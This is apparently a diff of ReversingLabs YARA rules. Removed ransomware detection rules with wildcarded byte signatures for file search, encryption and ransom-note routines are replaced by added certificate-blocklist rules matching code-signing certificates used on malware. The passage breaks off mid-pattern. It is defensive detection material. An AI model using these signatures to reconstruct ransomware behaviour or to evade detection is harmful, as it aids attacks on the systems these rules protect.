-		logic_hash = "ced234018f1f05601dd3be55eaecd2a1e116ad0b7bb9e0292434f11f19916ebe"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13620-L13636"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "84e2f427ee79b47db8d0e5f1e2217a7e1c1ea64047e01b4ea6db69f529501f36"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "IFN643"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files_1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B D6 C7 45 ?? ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8
-            ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ??
-            83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 8D ??
-            ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB
-            ?? 0F 84
-        }
-		$search_files_2 = {
-            80 BD ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 75 ?? 33
-            C0 EB ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 8D 85 ?? ?? ?? ??
-            50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D6 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 0D ?? ?? ?? ?? F7
-            E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 83 F8 ?? 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D6 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 4D ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 85 ??
-            ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ??
-            ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ??
-            0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ??
-            8B 35 ?? ?? ?? ?? 33 DB 2B CE C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F7 E9 C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C1 FA ?? 8B C2 C6 85 ?? ?? ?? ?? ?? C1 E8 ?? 03 C2 74 ?? 33 FF ?? ?? ??
-            8D 45 ?? 8D 0C 37 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 83 7D ?? ?? 89 45 ?? 8D 45 ?? 0F 43
-            45 ?? C6 00 ?? 8B 35 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B CE 43 F7 E9 83
-            C7 ?? C1 FA ?? 8B C2 C1 E8 ?? 03 C2 3B D8 72 ?? 83 7D ?? ?? 76 ?? 8D 45 ?? B9 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 0D ?? ?? ?? ?? F7 E9 C1
-            FA ?? 8B C2 C1 E8 ?? 03 C2 83 F8 ?? 0F 83 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ??
-            72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F
-            83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ??
-            ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83
-            F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
-            45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ??
-            8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76
-            ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1
-            ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8
-            ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ??
-            83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41
-            ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8
-            ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
-            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
-            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B C2 89 45 ?? 8B F9 8B 75 ?? 89 75 ??
-            C7 45 ?? ?? ?? ?? ?? 90 3B F8 0F 84 ?? ?? ?? ?? 89 75 ?? C6 45 ?? ?? 85 F6 74 ?? 8B
-            17 C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 46
-            ?? ?? ?? ?? ?? 72 ?? 8B 06 EB ?? 8B C6 C6 00 ?? 80 3A ?? 75 ?? 33 C0 EB ?? 8B C2 8D
-            58 ?? 66 90 8A 08 40 84 C9 75 ?? 2B C3 50 52 8B CE E8 ?? ?? ?? ?? 8B 45 ?? 83 C6 ??
-            C6 45 ?? ?? 89 75 ?? 83 C7 ?? EB ?? 8B 55 ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A
-            ?? 6A ?? E8 ?? ?? ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3
-            2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9
-            ?? ?? ?? ?? 33 C0 57 8B F9 40 F0 0F C1 05 ?? ?? ?? ?? 75 ?? 56 BE ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 83 C6 ?? 59 81 FE ?? ?? ?? ?? 7C ?? 5E 8B C7 5F C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $search_files_1 and $search_files_2 and $encrypt_files
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "6d:63:3d:f9:bb:60:15:fc:3e:ce:a9:9d:ff:30:9e:e7" and 1474156800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Retis : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_22E2A66E63B8Cb4Ec6989Bf7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Retis ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3d1de7c2-abb7-5411-a598-6bc68229a22a"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "5c028a6c-890c-54f1-aea2-ac04ce654907"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Retis.yara#L1-L74"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3e3429041acc5730b009916efbcd35c7cfd2b2877dc1d2cf980f7fb7d399d532"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13638-L13654"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2099c508d1fd986f34f14aa396a5aaa136e2cdd2226099acdca9c14f6f6342eb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Retis"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files = {
-            00 00 04 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C 00 08 28 ?? ?? ?? ??
-            0A 72 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 03 6F ?? ?? ??
-            ?? 0D 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 06 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 17 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ??
-            12 ?? 28 ?? ?? ?? ?? 13 07 00 11 ?? 73 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 16 FE
-            ?? 13 ?? 11 ?? 2C ?? 00 02 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ??
-            00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 00 00 2B ?? 00 1F ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ??
-            ?? 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 12 ??
-            28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 DE
-            ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ??
-            6F ?? ?? ?? ?? 00 DC 00 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 DC 2A
-        }
-		$search_drives = {
-            00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00
-            11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 07 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 00 00 09 17 58 0D 09 08 8E 69 32 ?? 07 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 26 00 07 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ??
-            13 ?? 00 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 00 03 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ??
-            12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 17 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 2B ??
-            12 ?? 28 ?? ?? ?? ?? 13 ?? 00 02 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ??
-            28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 11 ?? 6F
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE ??
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ??
-            ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 12 ??
-            28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-            DC 2A
-        }
-		$encrypt_files = {
-            00 03 19 17 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 0B 06 07
-            16 07 8E 69 6F ?? ?? ?? ?? 26 06 6F ?? ?? ?? ?? 00 03 18 18 73 ?? ?? ?? ??
-            0C 73 ?? ?? ?? ?? 0D 09 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 00 09 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 00 09 6F ?? ?? ?? ?? 13 ?? 08 11 ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 07
-            16 07 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00
-            03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_files and $search_drives and $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sivi Technology Limited" and pe.signatures [ i ] . serial == "22:e2:a6:6e:63:b8:cb:4e:c6:98:9b:f7" and 1466995365 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Policerecords : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_654B406De388Ec2Aec253Ff2Ba4C4Bbd : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects PoliceRecords ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bacd3f98-a069-58ca-8423-01fcef7d4062"
-		date = "2022-08-02"
-		modified = "2022-08-02"
+		id = "9820112d-d59b-57e7-ae78-7b427f70d529"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.PoliceRecords.yara#L1-L79"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "55cb1a5d030c47abb1a9ca9970fb19b3124128e409bc9515c173c33b2bb49a16"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13656-L13672"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a1aadaded55c8b0d85ac09ba9ab27fefaeec2969cdabaf26ff0c41bf33422ddc"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "PoliceRecords"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            00 72 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 06 6F ?? ?? ?? ?? 0C 04 0D 09 18 73 ?? ?? ??
-            ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 08 08 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ??
-            03 19 73 ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ??
-            25 13 ?? 15 FE 01 16 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ??
-            ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 2A
-        }
-		$find_files = {
-            11 ?? 11 ?? 9A 13 ?? 00 00 07 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E
-            69 32 ?? 00 DE ?? 26 00 00 DE ?? 17 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 0C 16 13 ??
-            2B ?? 00 00 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 11 ?? 9A 28 ?? ?? ?? ?? 00
-            72 ?? ?? ?? ?? 08 11 ?? 9A 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ??
-            00 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 00 72 ?? ?? ?? ?? 1D 28
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1D 28 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 7E ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ??
-            ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 16 8C
-            ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11
-            ?? 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F
-            ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ??
-            72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ??
-            13 ?? 11 ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 26 2A
-        }
-		$desktop_kill_tick = {
-            02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 09 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 13 ?? 07 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 07 28 ?? ?? ?? ?? 00
-            00 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 02 7B ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 2A
-        }
-		$drop_ransom_note = {
-            00 16 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 00 07 72 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07
-            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 DE ?? 07 2C ??
-            07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 26 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $desktop_kill_tick ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yijiajian (Amoy) Jiankan Tech Co.,LTD." and pe.signatures [ i ] . serial == "65:4b:40:6d:e3:88:ec:2a:ec:25:3f:f2:ba:4c:4b:bd" and 1398902400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Namaste : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_78D1817Ebcf338B4E9C810F9740A726B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Namaste ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e85d7ec3-367b-5bde-a570-8caa1f6cd61b"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "3d0a97a4-c45a-5238-a287-867529b470cb"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Namaste.yara#L1-L81"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5a952276f41b5524bcb82a9ceb076983d2faf2864b3bbd0a06d49bbd5edc1e0e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13674-L13690"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "62e59130ef0ac35b17a265bb8bc2031cac6a75c11925ccb21eb4601b8fbe1a63"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Namaste"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 02 06 07 9A 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32
-            ?? DE ?? 26 DE ?? 00 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 08 09 9A 13 ?? 02 11 ?? 28 ?? ??
-            ?? ?? 17 28 ?? ?? ?? ?? 09 17 58 0D 09 08 8E 69 32 ?? DE ?? 26 DE ?? 2A
-        }
-		$find_files_p2 = {
-            02 7B ?? ?? ?? ?? 2D ?? 03 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 17 2A 03 6F ?? ?? ?? ??
-            0A 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06
-            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ??
-            ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06
